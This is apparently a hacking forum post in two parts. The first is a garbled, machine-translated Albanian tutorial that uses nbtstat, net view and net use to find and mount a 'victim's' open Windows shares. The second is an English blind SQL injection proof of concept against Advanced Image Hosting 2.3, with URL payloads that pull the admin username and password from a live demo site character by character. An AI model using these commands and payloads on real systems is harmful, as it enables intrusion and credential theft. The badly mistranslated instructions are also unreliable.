Sulmo IP permes DOS-it
Kliko Start -> Run -> cmd
Lloji vijuese në Dos Prompt
-A Nbtstat IP adresa [p.sh.: nbtstat-A 207.175.1.1]
Kjo do t'ju japë një lexoni se duket si kjo
NetBIOS Remote Machine Name Tabela
____________________________________
Name Type Status
------------------------------------
abhi <00> Unique Registered
PUNA <00> Regjistruar GRUPE
abhi <03> Unique Registered
abhi <20> Unique Registered
PUNA <1E> Regjistruar GRUPE
PUNA <1d> Unique Registered
__MSBROWSE__. <01> Regjistruar GRUPE
____________________________________
Numrat në <> magjistare kodi janë vlerat. Ajo që ne po
interesuar në të është \"Kodi magjistare\" numri i <20>.
Një magji e kodit <20> do të thotë që ju kanë fotografi dhe u kthye në printer sharing.
Hapi tjetër është për të gjetur atë që është e përbashkët. Kjo është se si: --
Net view \ \
[e.g: net view \ \ 207.175.1.1]
Ju pastaj do të merrni një përgjigje se duket diçka e tillë.
Përbashkët të burimeve në \ \ ip_address
Lloji Sharename Koment
________________________________
MY DOCUMENTS Disk TEMP Disk
________________________________
(I komandës u përfundua me sukses.)
Kjo tregon se ju ka viktima potenciale tuaj tyre e mia
Dokumentet Dosjen e tyre të përbashkët dhe e përkohshme për të përbashkët.
Për atëherë ju duhet të merrni qasje në këto dosje e ardhshëm do të komandës.
Net përdorimin x: \ \ \ temp
[e.g: neto përdorimin x: \ \ 207.175.1.1 \ temp]
Nëse të gjitha shkon mirë për ju, pastaj ju do të merrni një përgjigje të
(I komandës u përfundua me sukses.)
Open my computer tuaj ju do të shihni viktimë e temp folder atje...
************************************************** **********************************************
Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln
[!] AIH Blind SQL Injection.
PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0 x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 1, 1))>100--++
First charcter of the username is char(100) --> char="d"
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 2, 1))>101--++
Second charter of the username is char(101) --> char2="e"
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 3, 1))>109--++
Next charter of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gal...*/concat(admin, 0x3a, pass)/**/from/**/setting/**/limit/**/0, 1), 4, 1))>111--++
And The last charter of the username is char(111) --> char4="o"
-------------
Like we see the username is "demo" now you can continue finding another
charters for password, changing the number of charters 5, 6, 7, 8, 9,
10........?>
__________________